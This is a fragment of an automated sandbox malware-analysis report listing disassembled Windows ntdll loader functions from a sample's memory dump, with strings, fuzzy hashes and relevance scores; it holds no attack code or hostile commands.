                                                                                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 34933439
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                      • API String ID: 3446177414-3779518884
                                                                                      • Opcode ID: af69d6e8b08e11c0143f4b6b750466b9db3326a0b7c542868e9701d040a5b434
                                                                                      • Instruction ID: d5e3a78c1680c0415de68c768a86fde0e4cf757aed4ab97789dbadf03b333443
                                                                                      • Opcode Fuzzy Hash: af69d6e8b08e11c0143f4b6b750466b9db3326a0b7c542868e9701d040a5b434
                                                                                      • Instruction Fuzzy Hash: CE313BB6A0C315EFFB21DB04AC44A55B7A8EB21B94F46936BE84067250F7B29D80C791
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348E237A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3492A79F
                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 3492A7AF
                                                                                      • apphelp.dll, xrefs: 348E2382
                                                                                      • LdrpDynamicShimModule, xrefs: 3492A7A5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 0-176724104
                                                                                      • Opcode ID: 92bea6441e7a06b9a9c7e6e538c744163bd1de69089e095ccaf1db9c5e00903a
                                                                                      • Instruction ID: 53ee98cb0d65ac4383f191712bf90881dac869b4523a7c9e26027bf73bdbb025
                                                                                      • Opcode Fuzzy Hash: 92bea6441e7a06b9a9c7e6e538c744163bd1de69089e095ccaf1db9c5e00903a
                                                                                      • Instruction Fuzzy Hash: E2311676A04204EFFB20DF5DC880A597BB9EBC4750F14415DE90077254DBB0AC82CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348EEE48 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 095e9e0839a0f279398120ccfab4849980e2d366eca474de78a9840015dadac6
                                                                                      • Instruction ID: bc4efafb823c30aea86754c6e0a1a0cd4aab922b6301175a8b24bff436e73b25
                                                                                      • Opcode Fuzzy Hash: 095e9e0839a0f279398120ccfab4849980e2d366eca474de78a9840015dadac6
                                                                                      • Instruction Fuzzy Hash: B9E11275E00708DFEB25CFA9C980AADBBF5FF49340F10466AEA55A7264D771A881CF10
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348BDF21 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: 0$0
                                                                                      • API String ID: 3446177414-203156872
                                                                                      • Opcode ID: a1f9f124d1767215975d94f4e9c49b81e136d1ae49450340b6358e0640506a23
                                                                                      • Instruction ID: 6a907e13b9ad420d5dac6531e93bb9d4e8f5b502a3a1b64158b54de56f80a085
                                                                                      • Opcode Fuzzy Hash: a1f9f124d1767215975d94f4e9c49b81e136d1ae49450340b6358e0640506a23
                                                                                      • Instruction Fuzzy Hash: 10415BB5608705AFD700CF28C444A5ABBE9FF89358F044A6EF988DB341D771EA05CB96
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%